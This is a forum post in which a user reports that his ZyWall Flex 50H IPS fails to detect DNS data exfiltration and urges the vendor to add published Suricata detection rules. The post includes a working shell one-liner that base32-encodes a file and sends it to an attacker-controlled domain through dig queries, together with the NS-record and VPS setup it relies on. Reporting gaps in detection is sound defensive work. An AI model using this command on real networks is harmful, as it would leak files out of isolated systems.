IPS - detect DNS data exfiltration

best_heygman

Hi, I just tested if my Flex 50H IPS would recognize DNS side channel data exfiltration. It does not. This really isn't good, because, and you can prove me wrong on this, most people who want an "air gapped network" still allow the devices to access the ZyWalls DNS server, for convenience. The problem is, that in most setups the ZyWall will forward the dns query if it doesn't know the subdomain. That DNS server will do a recursive lookup if it also doesn't know the subdomain. As an attacker, I can just create a NS record for a subdomain I control and point it to some VPS I am hosting. There, I can run something like this to log all dns queries that reach the server:
https://github.com/KarimPwnz/dns-exfil

In the "air gapped network" I can exfiltrate data with a simple one liner, like this:
cat /mnt/secret.pdf | base32 -w63 | tr -d = | while read a; do dig $a.exfil.my-domain.net; done;



I would have hoped that the IPS would catch this kind of traffic, since it is extremely unusual. But it does not. I did let it run for about 10 minutes, made about 1800 DNS queries that reached my server and exfiltrated about 0,25 MB of data. All that without the IPS of my ZyWall caring about it at all. 1800 DNS queries for different sub domains of the same domain in 10 Minutes from the same host really can't realistically be anything but side channel data exfiltration.

I think you could solve this problem quite easily, by adding these rules to your suricata ruleset. They are MIT licensed:
https://github.com/GDATAAdvancedAnalytics/Suricata-C2/blob/main/DNS/C2_DNS.rules

Here is the article, on how these rules were created. I haven't really read it, because I already know how to do it, but since the rules look fine to me, I guess the research methodology of the article should be fine to:
https://cyber.wtf/2024/12/06/detection-of-c2-using-suricata/